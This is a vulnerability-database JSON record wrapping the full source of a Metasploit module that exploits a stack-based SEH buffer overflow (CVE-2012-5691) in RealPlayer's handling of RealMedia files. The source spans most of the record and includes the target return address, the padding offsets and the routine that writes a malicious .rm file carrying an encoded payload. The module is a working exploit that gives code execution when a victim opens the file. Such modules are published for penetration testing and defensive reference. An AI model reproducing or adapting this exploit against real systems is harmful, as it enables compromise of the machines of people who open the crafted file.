{"id": "EDB-ID:23694", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "RealPlayer - '.RealMedia' File Handling Buffer Overflow (Metasploit)", "description": "", "published": "2012-12-27T00:00:00", "modified": "2012-12-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/23694", "reporter": "Metasploit", "references": [], "cvelist": ["2012-5691"], "immutableFields": [], "lastseen": "2022-01-13T06:27:58", "viewCount": 13, "enchantments": {"dependencies": {}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2012-5691"]}]}, "exploitation": null, "vulnersScore": 6.9}, "sourceHref": "https://www.exploit-db.com/download/23694", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'RealPlayer RealMedia File Handling Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow on RealPlayer <=15.0.6.14.\r\n\t\t\t\tThe vulnerability exists in the handling of RealMedia files, due to the insecure\r\n\t\t\t\tusage of the GetPrivateProfileString function to retrieve the URL property from an\r\n\t\t\t\tInternetShortcut section.\r\n\r\n\t\t\t\tThis module generates a malicious rm file which must be opened with RealPlayer via\r\n\t\t\t\tdrag and drop or double click methods. 
It has been tested successfully on Windows\r\n\t\t\t\tXP SP3 with RealPlayer 15.0.5.109.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'suto <suto[at]vnsecurity.net>' # Vulnerability discovery, metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-5691' ],\r\n\t\t\t\t\t[ 'OSVDB', '88486' ],\r\n\t\t\t\t\t[ 'BID', '56956' ],\r\n\t\t\t\t\t[ 'URL', 'http://service.real.com/realplayer/security/12142012_player/en/' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => 'process'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 2000\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP3 / Real Player 15.0.5.109',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x63f2b4b5, # ppr from rpap3260.dll\r\n\t\t\t\t\t\t\t'OffsetOne' => 2312, # Open via double click\r\n\t\t\t\t\t\t\t'OffsetTwo' => 2964 # Open via drag and drop\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Dec 14 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tbuffer = payload.encoded\r\n\t\tbuffer << rand_text(target['OffsetOne'] - buffer.length) # Open the file via double click\r\n\t\tbuffer << generate_seh_record(target.ret)\r\n\t\tbuffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"call $-#{target['OffsetOne'] + 8}\").encode_string\r\n\t\tbuffer << rand_text(target['OffsetTwo'] - buffer.length) # Open the file via drag and drop to the real player\r\n\t\tbuffer << generate_seh_record(target.ret)\r\n\t\tbuffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"call $-#{target['OffsetTwo'] + 8}\").encode_string\r\n\t\tbuffer << 
rand_text(7000) # Generate exception\r\n\r\n\t\tcontent = \"[InternetShortcut]\\nURL=\"\r\n\t\tfilecontent = content+buffer\r\n\r\n\t\tfile_create(filecontent)\r\n\r\n\tend\r\nend", "osvdbidlist": ["88486"], "exploitType": "remote", "verified": true, "_state": {"dependencies": 1645412510}}